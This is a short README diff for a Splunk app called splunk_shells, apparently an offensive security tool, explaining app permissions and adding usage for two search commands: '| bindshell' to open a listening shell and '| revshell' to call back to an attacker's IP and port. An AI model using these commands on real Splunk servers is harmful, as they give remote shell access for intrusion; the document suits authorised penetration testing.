TBGSecurity/splunk_shells/README.md

 Once Splunk is restarted click on Permissions for the splunk_shells app.
 Ensure the last permission "Sharing for config file-only objects" has "all apps" selected.

 ![Alt text](appserver/static/splunk_permissions.png?raw=true "Optional Title")

+# Usage
+using each of these shells can be done from the Search and Reporting app.
+Execute the following searches:

+'| bindshell <port number>' The port number can be specified or left off if left off the default is 8888

+'| revshell <attack ip> <attack port>' The Attacker IP and Port need to be specified for the shell to call back.